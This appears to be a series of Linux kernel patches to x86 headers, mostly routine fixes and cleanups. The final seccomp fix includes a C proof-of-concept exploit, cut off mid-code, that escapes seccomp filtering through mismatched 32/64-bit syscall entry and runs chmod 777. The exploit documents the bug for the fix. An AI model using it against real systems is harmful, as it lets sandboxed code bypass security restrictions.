From b534816b552d35bbd3c60702139ed5c7da2f55c2 Mon Sep 17 00:00:00 2001
From: Jeremy Fitzhardinge <jeremy@goop.org>
Date: Wed, 4 Feb 2009 18:33:38 -0800
Subject: x86: don't apply __supported_pte_mask to non-present ptes

On an x86 system which doesn't support global mappings,
__supported_pte_mask has _PAGE_GLOBAL clear, to make sure it never
appears in the PTE.  pfn_pte() and so on will enforce it with:

static inline pte_t pfn_pte(unsigned long page_nr, pgprot_t pgprot)
{
	return __pte((((phys_addr_t)page_nr << PAGE_SHIFT) |
		      pgprot_val(pgprot)) & __supported_pte_mask);
}

However, we overload _PAGE_GLOBAL with _PAGE_PROTNONE on non-present
ptes to distinguish them from swap entries.  However, applying
__supported_pte_mask indiscriminately will clear the bit and corrupt the
pte.

I guess the best fix is to only apply __supported_pte_mask to present
ptes.  This seems like the right solution to me, as it means we can
completely ignore the issue of overlaps between the present pte bits and
the non-present pte-as-swap entry use of the bits.

__supported_pte_mask contains the set of flags we support on the
current hardware.  We also use bits in the pte for things like
logically present ptes with no permissions, and swap entries for
swapped out pages.  We should only apply __supported_pte_mask to
present ptes, because otherwise we may destroy other information being
stored in the ptes.

Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
Signed-off-by: H. Peter Anvin <hpa@zytor.com>
---
 arch/x86/include/asm/pgtable.h  | 26 ++++++++++++++++++++------
 arch/x86/include/asm/xen/page.h |  2 +-
 2 files changed, 21 insertions(+), 7 deletions(-)

(limited to 'arch/x86/include')

diff --git a/arch/x86/include/asm/pgtable.h b/arch/x86/include/asm/pgtable.h
index 06bbcbd66e9..4f5af8447d5 100644
--- a/arch/x86/include/asm/pgtable.h
+++ b/arch/x86/include/asm/pgtable.h
@@ -302,16 +302,30 @@ static inline pte_t pte_mkspecial(pte_t pte)
 
 extern pteval_t __supported_pte_mask;
 
+/*
+ * Mask out unsupported bits in a present pgprot.  Non-present pgprots
+ * can use those bits for other purposes, so leave them be.
+ */
+static inline pgprotval_t massage_pgprot(pgprot_t pgprot)
+{
+	pgprotval_t protval = pgprot_val(pgprot);
+
+	if (protval & _PAGE_PRESENT)
+		protval &= __supported_pte_mask;
+
+	return protval;
+}
+
 static inline pte_t pfn_pte(unsigned long page_nr, pgprot_t pgprot)
 {
-	return __pte((((phys_addr_t)page_nr << PAGE_SHIFT) |
-		      pgprot_val(pgprot)) & __supported_pte_mask);
+	return __pte(((phys_addr_t)page_nr << PAGE_SHIFT) |
+		     massage_pgprot(pgprot));
 }
 
 static inline pmd_t pfn_pmd(unsigned long page_nr, pgprot_t pgprot)
 {
-	return __pmd((((phys_addr_t)page_nr << PAGE_SHIFT) |
-		      pgprot_val(pgprot)) & __supported_pte_mask);
+	return __pmd(((phys_addr_t)page_nr << PAGE_SHIFT) |
+		     massage_pgprot(pgprot));
 }
 
 static inline pte_t pte_modify(pte_t pte, pgprot_t newprot)
@@ -323,7 +337,7 @@ static inline pte_t pte_modify(pte_t pte, pgprot_t newprot)
 	 * the newprot (if present):
 	 */
 	val &= _PAGE_CHG_MASK;
-	val |= pgprot_val(newprot) & (~_PAGE_CHG_MASK) & __supported_pte_mask;
+	val |= massage_pgprot(newprot) & ~_PAGE_CHG_MASK;
 
 	return __pte(val);
 }
@@ -339,7 +353,7 @@ static inline pgprot_t pgprot_modify(pgprot_t oldprot, pgprot_t newprot)
 
 #define pte_pgprot(x) __pgprot(pte_flags(x) & PTE_FLAGS_MASK)
 
-#define canon_pgprot(p) __pgprot(pgprot_val(p) & __supported_pte_mask)
+#define canon_pgprot(p) __pgprot(massage_pgprot(p))
 
 static inline int is_new_memtype_allowed(unsigned long flags,
 						unsigned long new_flags)
diff --git a/arch/x86/include/asm/xen/page.h b/arch/x86/include/asm/xen/page.h
index 7ef617ef1df..4bd990ee43d 100644
--- a/arch/x86/include/asm/xen/page.h
+++ b/arch/x86/include/asm/xen/page.h
@@ -137,7 +137,7 @@ static inline pte_t mfn_pte(unsigned long page_nr, pgprot_t pgprot)
 	pte_t pte;
 
 	pte.pte = ((phys_addr_t)page_nr << PAGE_SHIFT) |
-		(pgprot_val(pgprot) & __supported_pte_mask);
+			massage_pgprot(pgprot);
 
 	return pte;
 }
-- 
cgit v1.2.3


From e736ad548db152776de61d7a26805cfae77ce5ce Mon Sep 17 00:00:00 2001
From: "Pallipadi, Venkatesh" <venkatesh.pallipadi@intel.com>
Date: Fri, 6 Feb 2009 16:52:05 -0800
Subject: x86: add clflush before monitor for Intel 7400 series

For Intel 7400 series CPUs, the recommendation is to use a clflush on the
monitored address just before monitor and mwait pair [1].

This clflush makes sure that there are no false wakeups from mwait when the
monitored address was recently written to.

[1] "MONITOR/MWAIT Recommendations for Intel Xeon Processor 7400 series"
    section in specification update document of 7400 series
    http://download.intel.com/design/xeon/specupdt/32033601.pdf

Signed-off-by: Venkatesh Pallipadi <venkatesh.pallipadi@intel.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
---
 arch/x86/include/asm/cpufeature.h | 1 +
 1 file changed, 1 insertion(+)

(limited to 'arch/x86/include')

diff --git a/arch/x86/include/asm/cpufeature.h b/arch/x86/include/asm/cpufeature.h
index ea408dcba51..7301e60dc4a 100644
--- a/arch/x86/include/asm/cpufeature.h
+++ b/arch/x86/include/asm/cpufeature.h
@@ -93,6 +93,7 @@
 #define X86_FEATURE_XTOPOLOGY	(3*32+22) /* cpu topology enum extensions */
 #define X86_FEATURE_TSC_RELIABLE (3*32+23) /* TSC is known to be reliable */
 #define X86_FEATURE_NONSTOP_TSC	(3*32+24) /* TSC does not stop in C states */
+#define X86_FEATURE_CLFLUSH_MONITOR (3*32+25) /* "" clflush reqd with monitor */
 
 /* Intel-defined CPU features, CPUID level 0x00000001 (ecx), word 4 */
 #define X86_FEATURE_XMM3	(4*32+ 0) /* "pni" SSE-3 */
-- 
cgit v1.2.3


From 3f4a739c6accd651a11fcf3c7a20ec8147c42660 Mon Sep 17 00:00:00 2001
From: Yinghai Lu <yinghai@kernel.org>
Date: Sun, 8 Feb 2009 16:18:03 -0800
Subject: x86: find nr_irqs_gsi with mp_ioapic_routing

Impact: find right nr_irqs_gsi on some systems.

One test-system has gap between gsi's:

[    0.000000] ACPI: IOAPIC (id[0x04] address[0xfec00000] gsi_base[0])
[    0.000000] IOAPIC[0]: apic_id 4, version 0, address 0xfec00000, GSI 0-23
[    0.000000] ACPI: IOAPIC (id[0x05] address[0xfeafd000] gsi_base[48])
[    0.000000] IOAPIC[1]: apic_id 5, version 0, address 0xfeafd000, GSI 48-54
[    0.000000] ACPI: IOAPIC (id[0x06] address[0xfeafc000] gsi_base[56])
[    0.000000] IOAPIC[2]: apic_id 6, version 0, address 0xfeafc000, GSI 56-62
...
[    0.000000] nr_irqs_gsi: 38

So nr_irqs_gsi is not right. some irq for MSI will overwrite with io_apic.

need to get that with acpi_probe_gsi when acpi io_apic is used

Signed-off-by: Yinghai Lu <yinghai@kernel.org>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
---
 arch/x86/include/asm/mpspec.h | 6 ++++++
 1 file changed, 6 insertions(+)

(limited to 'arch/x86/include')

diff --git a/arch/x86/include/asm/mpspec.h b/arch/x86/include/asm/mpspec.h
index 62d14ce3cd0..bd22f2a3713 100644
--- a/arch/x86/include/asm/mpspec.h
+++ b/arch/x86/include/asm/mpspec.h
@@ -60,6 +60,7 @@ extern void mp_override_legacy_irq(u8 bus_irq, u8 polarity, u8 trigger,
 				   u32 gsi);
 extern void mp_config_acpi_legacy_irqs(void);
 extern int mp_register_gsi(u32 gsi, int edge_level, int active_high_low);
+extern int acpi_probe_gsi(void);
 #ifdef CONFIG_X86_IO_APIC
 extern int mp_config_acpi_gsi(unsigned char number, unsigned int devfn, u8 pin,
 				u32 gsi, int triggering, int polarity);
@@ -71,6 +72,11 @@ mp_config_acpi_gsi(unsigned char number, unsigned int devfn, u8 pin,
 	return 0;
 }
 #endif
+#else /* !CONFIG_ACPI: */
+static inline int acpi_probe_gsi(void)
+{
+	return 0;
+}
 #endif /* CONFIG_ACPI */
 
 #define PHYSID_ARRAY_SIZE	BITS_TO_LONGS(MAX_APICS)
-- 
cgit v1.2.3


From 914c3d630b29b07d04908eab1b246812dadd5bd6 Mon Sep 17 00:00:00 2001
From: Tejun Heo <tj@kernel.org>
Date: Mon, 9 Feb 2009 22:17:39 +0900
Subject: x86: include correct %gs in a.out core dump

Impact: dump the correct %gs into a.out core dump

aout_dump_thread() read %gs but didn't include it in core dump.  Fix
it.

Signed-off-by: Tejun Heo <tj@kernel.org>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
---
 arch/x86/include/asm/a.out-core.h | 4 +---
 1 file changed, 1 insertion(+), 3 deletions(-)

(limited to 'arch/x86/include')

diff --git a/arch/x86/include/asm/a.out-core.h b/arch/x86/include/asm/a.out-core.h
index 37822206083..3c601f8224b 100644
--- a/arch/x86/include/asm/a.out-core.h
+++ b/arch/x86/include/asm/a.out-core.h
@@ -23,8 +23,6 @@
  */
 static inline void aout_dump_thread(struct pt_regs *regs, struct user *dump)
 {
-	u16 gs;
-
 /* changed the size calculations - should hopefully work better. lbt */
 	dump->magic = CMAGIC;
 	dump->start_code = 0;
@@ -57,7 +55,7 @@ static inline void aout_dump_thread(struct pt_regs *regs, struct user *dump)
 	dump->regs.ds = (u16)regs->ds;
 	dump->regs.es = (u16)regs->es;
 	dump->regs.fs = (u16)regs->fs;
-	savesegment(gs, gs);
+	savesegment(gs, dump->regs.gs);
 	dump->regs.orig_ax = regs->orig_ax;
 	dump->regs.ip = regs->ip;
 	dump->regs.cs = (u16)regs->cs;
-- 
cgit v1.2.3


From ae6af41f5a4841f06eb92bc86ad020ad44ae2a30 Mon Sep 17 00:00:00 2001
From: Tejun Heo <tj@kernel.org>
Date: Mon, 9 Feb 2009 22:17:39 +0900
Subject: x86: math_emu info cleanup

Impact: cleanup

* Come on, struct info?  s/struct info/struct math_emu_info/

* Use struct pt_regs and kernel_vm86_regs instead of defining its own
  register frame structure.

Signed-off-by: Tejun Heo <tj@kernel.org>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
---
 arch/x86/include/asm/math_emu.h  | 29 ++++++++---------------------
 arch/x86/include/asm/processor.h |  2 +-
 2 files changed, 9 insertions(+), 22 deletions(-)

(limited to 'arch/x86/include')

diff --git a/arch/x86/include/asm/math_emu.h b/arch/x86/include/asm/math_emu.h
index 5a65b107ad5..302492c7795 100644
--- a/arch/x86/include/asm/math_emu.h
+++ b/arch/x86/include/asm/math_emu.h
@@ -1,31 +1,18 @@
 #ifndef _ASM_X86_MATH_EMU_H
 #define _ASM_X86_MATH_EMU_H
 
+#include <asm/ptrace.h>
+#include <asm/vm86.h>
+
 /* This structure matches the layout of the data saved to the stack
    following a device-not-present interrupt, part of it saved
    automatically by the 80386/80486.
    */
-struct info {
+struct math_emu_info {
 	long ___orig_eip;
-	long ___ebx;
-	long ___ecx;
-	long ___edx;
-	long ___esi;
-	long ___edi;
-	long ___ebp;
-	long ___eax;
-	long ___ds;
-	long ___es;
-	long ___fs;
-	long ___orig_eax;
-	long ___eip;
-	long ___cs;
-	long ___eflags;
-	long ___esp;
-	long ___ss;
-	long ___vm86_es; /* This and the following only in vm86 mode */
-	long ___vm86_ds;
-	long ___vm86_fs;
-	long ___vm86_gs;
+	union {
+		struct pt_regs regs;
+		struct kernel_vm86_regs vm86;
+	};
 };
 #endif /* _ASM_X86_MATH_EMU_H */
diff --git a/arch/x86/include/asm/processor.h b/arch/x86/include/asm/processor.h
index 091cd8855f2..3bfd5235a9e 100644
--- a/arch/x86/include/asm/processor.h
+++ b/arch/x86/include/asm/processor.h
@@ -353,7 +353,7 @@ struct i387_soft_struct {
 	u8			no_update;
 	u8			rm;
 	u8			alimit;
-	struct info		*info;
+	struct math_emu_info	*info;
 	u32			entry_eip;
 };
 
-- 
cgit v1.2.3


From a5ef7ca0e2636bad0ccd07b996d775348ae2b65e Mon Sep 17 00:00:00 2001
From: Kyle McMartin <kyle@redhat.com>
Date: Sun, 8 Feb 2009 17:39:58 -0500
Subject: x86: spinlocks: define dummy __raw_spin_is_contended

Architectures other than mips and x86 are not using ticket spinlocks.
Therefore, the contention on the lock is meaningless, since there is
nobody known to be waiting on it (arguably /fairly/ unfair locks).

Dummy it out to return 0 on other architectures.

Signed-off-by: Kyle McMartin <kyle@redhat.com>
Acked-by: Ralf Baechle <ralf@linux-mips.org>
Acked-by: Ingo Molnar <mingo@elte.hu>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
---
 arch/x86/include/asm/paravirt.h | 1 +
 arch/x86/include/asm/spinlock.h | 1 +
 2 files changed, 2 insertions(+)

(limited to 'arch/x86/include')

diff --git a/arch/x86/include/asm/paravirt.h b/arch/x86/include/asm/paravirt.h
index ba3e2ff6aed..c09a1412758 100644
--- a/arch/x86/include/asm/paravirt.h
+++ b/arch/x86/include/asm/paravirt.h
@@ -1402,6 +1402,7 @@ static inline int __raw_spin_is_contended(struct raw_spinlock *lock)
 {
 	return PVOP_CALL1(int, pv_lock_ops.spin_is_contended, lock);
 }
+#define __raw_spin_is_contended	__raw_spin_is_contended
 
 static __always_inline void __raw_spin_lock(struct raw_spinlock *lock)
 {
diff --git a/arch/x86/include/asm/spinlock.h b/arch/x86/include/asm/spinlock.h
index d17c91981da..8247e94ac6b 100644
--- a/arch/x86/include/asm/spinlock.h
+++ b/arch/x86/include/asm/spinlock.h
@@ -245,6 +245,7 @@ static inline int __raw_spin_is_contended(raw_spinlock_t *lock)
 {
 	return __ticket_spin_is_contended(lock);
 }
+#define __raw_spin_is_contended	__raw_spin_is_contended
 
 static __always_inline void __raw_spin_lock(raw_spinlock_t *lock)
 {
-- 
cgit v1.2.3


From d315760ffa261c15ff92699ac6f514112543d7ca Mon Sep 17 00:00:00 2001
From: Tejun Heo <tj@kernel.org>
Date: Mon, 9 Feb 2009 22:17:39 +0900
Subject: x86: fix math_emu register frame access

do_device_not_available() is the handler for #NM and it declares that
it takes a unsigned long and calls math_emu(), which takes a long
argument and surprisingly expects the stack frame starting at the zero
argument would match struct math_emu_info, which isn't true regardless
of configuration in the current code.

This patch makes do_device_not_available() take struct pt_regs like
other exception handlers and initialize struct math_emu_info with
pointer to it and pass pointer to the math_emu_info to math_emulate()
like normal C functions do.  This way, unless gcc makes a copy of
struct pt_regs in do_device_not_available(), the register frame is
correctly accessed regardless of kernel configuration or compiler
used.

This doesn't fix all math_emu problems but it at least gets it
somewhat working.

Signed-off-by: Tejun Heo <tj@kernel.org>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
---
 arch/x86/include/asm/math_emu.h | 4 ++--
 arch/x86/include/asm/traps.h    | 4 ++--
 2 files changed, 4 insertions(+), 4 deletions(-)

(limited to 'arch/x86/include')

diff --git a/arch/x86/include/asm/math_emu.h b/arch/x86/include/asm/math_emu.h
index 302492c7795..031f6266f42 100644
--- a/arch/x86/include/asm/math_emu.h
+++ b/arch/x86/include/asm/math_emu.h
@@ -11,8 +11,8 @@
 struct math_emu_info {
 	long ___orig_eip;
 	union {
-		struct pt_regs regs;
-		struct kernel_vm86_regs vm86;
+		struct pt_regs *regs;
+		struct kernel_vm86_regs *vm86;
 	};
 };
 #endif /* _ASM_X86_MATH_EMU_H */
diff --git a/arch/x86/include/asm/traps.h b/arch/x86/include/asm/traps.h
index 2ee0a3bceed..cf3bb053da0 100644
--- a/arch/x86/include/asm/traps.h
+++ b/arch/x86/include/asm/traps.h
@@ -41,7 +41,7 @@ dotraplinkage void do_int3(struct pt_regs *, long);
 dotraplinkage void do_overflow(struct pt_regs *, long);
 dotraplinkage void do_bounds(struct pt_regs *, long);
 dotraplinkage void do_invalid_op(struct pt_regs *, long);
-dotraplinkage void do_device_not_available(struct pt_regs *, long);
+dotraplinkage void do_device_not_available(struct pt_regs);
 dotraplinkage void do_coprocessor_segment_overrun(struct pt_regs *, long);
 dotraplinkage void do_invalid_TSS(struct pt_regs *, long);
 dotraplinkage void do_segment_not_present(struct pt_regs *, long);
@@ -77,7 +77,7 @@ extern int panic_on_unrecovered_nmi;
 extern int kstack_depth_to_print;
 
 void math_error(void __user *);
-asmlinkage void math_emulate(long);
+void math_emulate(struct math_emu_info *);
 #ifdef CONFIG_X86_32
 unsigned long patch_espfix_desc(unsigned long, unsigned long);
 #else
-- 
cgit v1.2.3


From be03d9e8022030c16abf534e33e185bfc3d40eef Mon Sep 17 00:00:00 2001
From: Suresh Siddha <suresh.b.siddha@intel.com>
Date: Wed, 11 Feb 2009 11:20:23 -0800
Subject: x86, pat: fix warn_on_once() while mapping 0-1MB range with /dev/mem

Jeff Mahoney reported:

> With Suse's hwinfo tool, on -tip:
> WARNING: at arch/x86/mm/pat.c:637 reserve_pfn_range+0x5b/0x26d()

reserve_pfn_range() is not tracking the memory range below 1MB
as non-RAM and as such is inconsistent with similar checks in
reserve_memtype() and free_memtype()

Rename the pagerange_is_ram() to pat_pagerange_is_ram() and add the
"track legacy 1MB region as non RAM" condition.

And also, fix reserve_pfn_range() to return -EINVAL, when the pfn
range is RAM. This is to be consistent with this API design.

Reported-and-tested-by: Jeff Mahoney <jeffm@suse.com>
Signed-off-by: Suresh Siddha <suresh.b.siddha@intel.com>
Signed-off-by: Venkatesh Pallipadi <venkatesh.pallipadi@intel.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
---
 arch/x86/include/asm/page.h | 1 -
 1 file changed, 1 deletion(-)

(limited to 'arch/x86/include')

diff --git a/arch/x86/include/asm/page.h b/arch/x86/include/asm/page.h
index e9873a2e869..776579119a0 100644
--- a/arch/x86/include/asm/page.h
+++ b/arch/x86/include/asm/page.h
@@ -57,7 +57,6 @@ typedef struct { pgdval_t pgd; } pgd_t;
 typedef struct { pgprotval_t pgprot; } pgprot_t;
 
 extern int page_is_ram(unsigned long pagenr);
-extern int pagerange_is_ram(unsigned long start, unsigned long end);
 extern int devmem_is_allowed(unsigned long pagenr);
 extern void map_devmem(unsigned long pfn, unsigned long size,
 		       pgprot_t vma_prot);
-- 
cgit v1.2.3


From d85cf93da66977dbc645352be1b2084a659d8a0b Mon Sep 17 00:00:00 2001
From: Jeremy Fitzhardinge <jeremy@goop.org>
Date: Thu, 12 Feb 2009 10:02:56 -0800
Subject: x86/paravirt: make arch_flush_lazy_mmu/cpu disable preemption

Impact: avoid access to percpu vars in preempible context

They are intended to be used whenever there's the possibility
that there's some stale state which is going to be overwritten
with a queued update, or to force a state change when we may be
in lazy mode.  Either way, we could end up calling it with
preemption enabled, so wrap the functions in their own little
preempt-disable section so they can be safely called in any
context (though preemption should never be enabled if we're actually
in a lazy state).

(Move out of line to avoid #include dependencies.)

Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
---
 arch/x86/include/asm/paravirt.h | 17 ++---------------
 1 file changed, 2 insertions(+), 15 deletions(-)

(limited to 'arch/x86/include')

diff --git a/arch/x86/include/asm/paravirt.h b/arch/x86/include/asm/paravirt.h
index ba3e2ff6aed..a660eceaa27 100644
--- a/arch/x86/include/asm/paravirt.h
+++ b/arch/x86/include/asm/paravirt.h
@@ -1352,14 +1352,7 @@ static inline void arch_leave_lazy_cpu_mode(void)
 	PVOP_VCALL0(pv_cpu_ops.lazy_mode.leave);
 }
 
-static inline void arch_flush_lazy_cpu_mode(void)
-{
-	if (unlikely(paravirt_get_lazy_mode() == PARAVIRT_LAZY_CPU)) {
-		arch_leave_lazy_cpu_mode();
-		arch_enter_lazy_cpu_mode();
-	}
-}
-
+void arch_flush_lazy_cpu_mode(void);
 
 #define  __HAVE_ARCH_ENTER_LAZY_MMU_MODE
 static inline void arch_enter_lazy_mmu_mode(void)
@@ -1372,13 +1365,7 @@ static inline void arch_leave_lazy_mmu_mode(void)
 	PVOP_VCALL0(pv_mmu_ops.lazy_mode.leave);
 }
 
-static inline void arch_flush_lazy_mmu_mode(void)
-{
-	if (unlikely(paravirt_get_lazy_mode() == PARAVIRT_LAZY_MMU)) {
-		arch_leave_lazy_mmu_mode();
-		arch_enter_lazy_mmu_mode();
-	}
-}
+void arch_flush_lazy_mmu_mode(void);
 
 static inline void __set_fixmap(unsigned /* enum fixed_addresses */ idx,
 				unsigned long phys, pgprot_t flags)
-- 
cgit v1.2.3


From 7a0eb1960e8ddcb68ea631caf16815485af0e228 Mon Sep 17 00:00:00 2001
From: Avi Kivity <avi@redhat.com>
Date: Mon, 19 Jan 2009 14:57:52 +0200
Subject: KVM: Avoid using CONFIG_ in userspace visible headers

Kconfig symbols are not available in userspace, and are not stripped by
headers-install.  Avoid their use by adding #defines in <asm/kvm.h> to
suit each architecture.

Signed-off-by: Avi Kivity <avi@redhat.com>
---
 arch/x86/include/asm/kvm.h | 7 +++++++
 1 file changed, 7 insertions(+)

(limited to 'arch/x86/include')

diff --git a/arch/x86/include/asm/kvm.h b/arch/x86/include/asm/kvm.h
index d2e3bf3608a..886c9402ec4 100644
--- a/arch/x86/include/asm/kvm.h
+++ b/arch/x86/include/asm/kvm.h
@@ -9,6 +9,13 @@
 #include <linux/types.h>
 #include <linux/ioctl.h>
 
+/* Select x86 specific features in <linux/kvm.h> */
+#define __KVM_HAVE_PIT
+#define __KVM_HAVE_IOAPIC
+#define __KVM_HAVE_DEVICE_ASSIGNMENT
+#define __KVM_HAVE_MSI
+#define __KVM_HAVE_USER_NMI
+
 /* Architectural interrupt line count. */
 #define KVM_NR_INTERRUPTS 256
 
-- 
cgit v1.2.3


From f2dbcfa738368c8a40d4a5f0b65dc9879577cb21 Mon Sep 17 00:00:00 2001
From: KAMEZAWA Hiroyuki <kamezawa.hiroyu@jp.fujitsu.com>
Date: Wed, 18 Feb 2009 14:48:32 -0800
Subject: mm: clean up for early_pfn_to_nid()

What's happening is that the assertion in mm/page_alloc.c:move_freepages()
is triggering:

	BUG_ON(page_zone(start_page) != page_zone(end_page));

Once I knew this is what was happening, I added some annotations:

	if (unlikely(page_zone(start_page) != page_zone(end_page))) {
		printk(KERN_ERR "move_freepages: Bogus zones: "
		       "start_page[%p] end_page[%p] zone[%p]\n",
		       start_page, end_page, zone);
		printk(KERN_ERR "move_freepages: "
		       "start_zone[%p] end_zone[%p]\n",
		       page_zone(start_page), page_zone(end_page));
		printk(KERN_ERR "move_freepages: "
		       "start_pfn[0x%lx] end_pfn[0x%lx]\n",
		       page_to_pfn(start_page), page_to_pfn(end_page));
		printk(KERN_ERR "move_freepages: "
		       "start_nid[%d] end_nid[%d]\n",
		       page_to_nid(start_page), page_to_nid(end_page));
 ...

And here's what I got:

	move_freepages: Bogus zones: start_page[2207d0000] end_page[2207dffc0] zone[fffff8103effcb00]
	move_freepages: start_zone[fffff8103effcb00] end_zone[fffff8003fffeb00]
	move_freepages: start_pfn[0x81f600] end_pfn[0x81f7ff]
	move_freepages: start_nid[1] end_nid[0]

My memory layout on this box is:

[    0.000000] Zone PFN ranges:
[    0.000000]   Normal   0x00000000 -> 0x0081ff5d
[    0.000000] Movable zone start PFN for each node
[    0.000000] early_node_map[8] active PFN ranges
[    0.000000]     0: 0x00000000 -> 0x00020000
[    0.000000]     1: 0x00800000 -> 0x0081f7ff
[    0.000000]     1: 0x0081f800 -> 0x0081fe50
[    0.000000]     1: 0x0081fed1 -> 0x0081fed8
[    0.000000]     1: 0x0081feda -> 0x0081fedb
[    0.000000]     1: 0x0081fedd -> 0x0081fee5
[    0.000000]     1: 0x0081fee7 -> 0x0081ff51
[    0.000000]     1: 0x0081ff59 -> 0x0081ff5d

So it's a block move in that 0x81f600-->0x81f7ff region which triggers
the problem.

This patch:

Declaration of early_pfn_to_nid() is scattered over per-arch include
files, and it seems it's complicated to know when the declaration is used.
 I think it makes fix-for-memmap-init not easy.

This patch moves all declaration to include/linux/mm.h

After this,
  if !CONFIG_NODES_POPULATES_NODE_MAP && !CONFIG_HAVE_ARCH_EARLY_PFN_TO_NID
     -> Use static definition in include/linux/mm.h
  else if !CONFIG_HAVE_ARCH_EARLY_PFN_TO_NID
     -> Use generic definition in mm/page_alloc.c
  else
     -> per-arch back end function will be called.

Signed-off-by: KAMEZAWA Hiroyuki <kamezawa.hiroyu@jp.fujitsu.com>
Tested-by: KOSAKI Motohiro <kosaki.motohiro@jp.fujitsu.com>
Reported-by: David Miller <davem@davemlloft.net>
Cc: Mel Gorman <mel@csn.ul.ie>
Cc: Heiko Carstens <heiko.carstens@de.ibm.com>
Cc: <stable@kernel.org>		[2.6.25.x, 2.6.26.x, 2.6.27.x, 2.6.28.x]
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
---
 arch/x86/include/asm/mmzone_32.h | 2 --
 arch/x86/include/asm/mmzone_64.h | 2 --
 2 files changed, 4 deletions(-)

(limited to 'arch/x86/include')

diff --git a/arch/x86/include/asm/mmzone_32.h b/arch/x86/include/asm/mmzone_32.h
index 07f1af494ca..105fb90a063 100644
--- a/arch/x86/include/asm/mmzone_32.h
+++ b/arch/x86/include/asm/mmzone_32.h
@@ -32,8 +32,6 @@ static inline void get_memcfg_numa(void)
 	get_memcfg_numa_flat();
 }
 
-extern int early_pfn_to_nid(unsigned long pfn);
-
 extern void resume_map_numa_kva(pgd_t *pgd);
 
 #else /* !CONFIG_NUMA */
diff --git a/arch/x86/include/asm/mmzone_64.h b/arch/x86/include/asm/mmzone_64.h
index a5b3817d4b9..a29f48c2a32 100644
--- a/arch/x86/include/asm/mmzone_64.h
+++ b/arch/x86/include/asm/mmzone_64.h
@@ -40,8 +40,6 @@ static inline __attribute__((pure)) int phys_to_nid(unsigned long addr)
 #define node_end_pfn(nid)       (NODE_DATA(nid)->node_start_pfn +	\
 				 NODE_DATA(nid)->node_spanned_pages)
 
-extern int early_pfn_to_nid(unsigned long pfn);
-
 #ifdef CONFIG_NUMA_EMU
 #define FAKE_NODE_MIN_SIZE	(64 * 1024 * 1024)
 #define FAKE_NODE_MIN_HASH_MASK	(~(FAKE_NODE_MIN_SIZE - 1UL))
-- 
cgit v1.2.3


From 4ab0d47d0ab311eb181532c1ecb6d02905685071 Mon Sep 17 00:00:00 2001
From: Venkatesh Pallipadi <venkatesh.pallipadi@intel.com>
Date: Tue, 24 Feb 2009 17:35:12 -0800
Subject: gpu/drm, x86, PAT: io_mapping_create_wc and resource_size_t

io_mapping_create_wc should take a resource_size_t parameter in place of
unsigned long. With unsigned long, there will be no way to map greater than 4GB
address in i386/32 bit.

On x86, greater than 4GB addresses cannot be mapped on i386 without PAE. Return
error for such a case.

Patch also adds a structure for io_mapping, that saves the base, size and
type on HAVE_ATOMIC_IOMAP archs, that can be used to verify the offset on
io_mapping_map calls.

Signed-off-by: Venkatesh Pallipadi <venkatesh.pallipadi@intel.com>
Signed-off-by: Suresh Siddha <suresh.b.siddha@intel.com>
Cc: Dave Airlie <airlied@redhat.com>
Cc: Jesse Barnes <jbarnes@virtuousgeek.org>
Cc: Eric Anholt <eric@anholt.net>
Cc: Keith Packard <keithp@keithp.com>
Signed-off-by: Ingo Molnar <mingo@elte.hu>
---
 arch/x86/include/asm/iomap.h | 3 +++
 1 file changed, 3 insertions(+)

(limited to 'arch/x86/include')

diff --git a/arch/x86/include/asm/iomap.h b/arch/x86/include/asm/iomap.h
index c1f06289b14..86af26091d6 100644
--- a/arch/x86/include/asm/iomap.h
+++ b/arch/x86/include/asm/iomap.h
@@ -23,6 +23,9 @@
 #include <asm/pgtable.h>
 #include <asm/tlbflush.h>
 
+int
+is_io_mapping_possible(resource_size_t base, unsigned long size);
+
 void *
 iomap_atomic_prot_pfn(unsigned long pfn, enum km_type type, pgprot_t prot);
 
-- 
cgit v1.2.3


From 5b1017404aea6d2e552e991b3fd814d839e9cd67 Mon Sep 17 00:00:00 2001
From: Roland McGrath <roland@redhat.com>
Date: Fri, 27 Feb 2009 23:25:54 -0800
Subject: x86-64: seccomp: fix 32/64 syscall hole

On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
ljmp, and then use the "syscall" instruction to make a 64-bit system
call.  A 64-bit process make a 32-bit system call with int $0x80.

In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
the wrong system call number table.  The fix is simple: test TS_COMPAT
instead of TIF_IA32.  Here is an example exploit:

	/* test case for seccomp circumvention on x86-64

	   There are two failure modes: compile with -m64 or compile with -m32.

	   The -m64 case is the worst one, because it does "chmod 777 ." (could
	   be any chmod call).  The -m32 case demonstrates it was able to do
	   stat(), which can glean information but not harm anything directly.

	   A buggy kernel will let the test do something, print, and exit 1; a
	   fixed kernel will make it exit with SIGKILL before it does anything.
	*/

	#define _GNU_SOURCE
	#include <assert.h>
	#include <inttypes.h>
	#include <stdio.h>
	#include <linux/prctl.h>
	#include <sys/stat.h>
	#include <unistd.h>
	#include <asm/unistd.h>

	int
	main (int argc, char **argv)
	{
	  char buf[100];
	  static const char dot[] = ".";
	  long ret;
	  unsigned st[24];

	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");

	#ifdef __x86_64__
	  assert ((uintptr_t) dot < (1UL << 32));
	  asm ("int $0x80 # %0 <- %1(%2 %3)"
	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
	  ret = snprintf (buf, sizeof buf,
			  "result %ld (check mode on .!)\n", ret);
	#elif defined __i386__
	  asm (".code32\n"
	       "pushl %%cs\n"
	       "pushl $2f\n"
	       "ljmpl $0x33, $1f\n"
	       ".code64\n"
	       "1: syscall # %0 <- %1(%2 %3)\n"
	       "lretl\n"
	       ".code32\n"
	       "2:"
	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
	  if (ret == 0)
